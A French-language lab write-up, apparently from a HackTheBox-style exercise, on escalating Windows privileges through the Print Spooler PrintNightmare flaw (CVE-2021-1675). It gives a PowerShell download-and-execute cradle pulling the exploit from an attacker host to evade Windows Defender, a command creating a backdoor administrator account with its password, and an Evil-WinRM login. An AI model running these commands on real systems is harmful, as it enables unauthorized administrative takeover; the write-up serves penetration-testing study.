# spoolsv - Vulnerable Processes (Windows Privilege Escalation)

> **spoolsv** (ou **spooler service**) est un processus Windows responsable de la gestion de la file d'attente des impressions. Il permet de stocker les documents en attente d'impression et de les envoyer à l'imprimante lorsque celle-ci est prête. Ce service est essentiel pour le bon fonctionnement des imprimantes sur un réseau, mais il peut aussi être exploité dans des attaques de type **PrintNightmare** pour obtenir des privilèges élevés, notamment sur les contrôleurs de domaine.

Un processus **spoolsv** vulnérable est détecté, écoutant sur un port TCP.

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FbCdoeOrywF1OnUal7n9h%2Fimage.png?alt=media&#x26;token=cc359c16-9412-4cac-b9c2-d5c1f1978df5" alt=""><figcaption></figcaption></figure>

Utilisation d'un script d'exploit pour PrintNightmare, disponible sur GitHub.

{% embed url="<https://github.com/calebstewart/CVE-2021-1675>" %}

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2Fl1GWK3f0YpUJpN4ejSrR%2Fimage.png?alt=media&#x26;token=391d93f0-0338-4cd4-b4ab-e3026cc354c2" alt=""><figcaption></figcaption></figure>

voila les commandes a executter

1. **Transfert du script** pour éviter le blocage par Windows Defender :

```powershell
IEX(New-Object Net.WebClient).downloadString('http://10.10.14.7/CVE-2021-1675.ps1')
```

2. **Création d’un utilisateur administrateur** nommé `jordan` :

```powershell
Invoke-Nightmare -DriverName "Xerox" -NewUser "jordan" -NewPassword "jordan1234!$" 
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2FdWcvRek15jvF9mGXqfyW%2Fimage.png?alt=media&#x26;token=a56b54dc-b1b8-4681-bf1d-56fddd241dbc" alt=""><figcaption></figcaption></figure>

`jordan:jordan1234!$`

> **Statut** : L’utilisateur `jordan` est désormais dans le groupe administrateurs.

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F6lXoK4i7acIb61gAEVUv%2Fimage.png?alt=media&#x26;token=82bf2ad6-ae09-4193-b1fa-6a8a0fa53e64" alt=""><figcaption></figcaption></figure>

### Connexion avec les Privilèges Administrateurs

Connexion à la machine via WinRM avec **Evil-WinRM** :

```powershell
evil-winrm -i 10.10.11.106 -u 'jordan' -p 'jordan1234!$'
```

<figure><img src="https://3892280740-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FOeqybfPyWliD6m1hbKa3%2Fuploads%2F2UPqKB9TIYQdIuzLIjIU%2Fimage.png?alt=media&#x26;token=9359975e-fdbf-44ee-89b2-d1b4159be14e" alt=""><figcaption></figcaption></figure>
